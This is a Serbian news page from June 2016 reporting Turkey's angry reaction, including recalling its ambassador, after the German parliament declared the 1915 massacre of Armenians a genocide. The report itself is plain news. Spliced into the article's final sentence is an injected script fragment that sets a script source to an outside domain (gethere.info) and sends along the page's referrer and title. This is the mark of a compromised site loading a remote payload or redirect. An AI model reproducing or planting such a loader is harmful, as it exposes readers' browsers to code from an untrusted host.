Svet
02.06.2016. 12:33
ekspres

TURSKA BESNA: Nemačka proglasila masakr nad Jermenima genocidom

Turski predsednik Redžep Tajip Erdogan rekao je da će se nemačka rezolucija ozbiljno odraziti na odnose Berlina i Ankare

ANKARA 2. juna - Turska je pozvala na konsultacije ambasadora te zemlje u Nemačkoj nakon što su nemački poslanici danas usvojili rezoluciju kojom se masakr otomanskih snaga iz 1915. nad Jermenima naziva "genocidom", rekao je premijer Turske Binali Jildirim.

Turski predsednik Redžep Tajip Erdogan rekao je da će se nemačka rezolucija ozbiljno odraziti na odnose Berlina i Ankare.

I drugi visoki turski zvaničnici osudili su rezoluciju koju su nemački poslanici ranije danas gotovo jednoglasno usvojili, a kojom se turski masakr nad Jermenima iz 1915. priznaje kao genocid.

Turski zvaničnici su rezoluciju nazvali ozbiljnom greškom uz ocenu da to stavlja na probu odnose dve zemlje.

Nemački poslanici usvojili su danas gotovo jednoglasno rezoluciju kojom se turski masakr nad Jermenima priznaje kao genocid, što su turski zvaničnici nazvali ozbiljnom greškom uz ocenu da to stavlja na probu odnose dve zemlje. Turska smatra da ubijanje Jermena tokom Prvog svetskog rata nije bilo genocid.s.src='http://gethere.info/kt/?264dpr&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Komentari
Dodaj komentar
Close
Vremenska prognoza
light intensity drizzle
16°C
28.09.2021.
Beograd

Najnovije

Vidi sve

Najčitanije

Vidi sve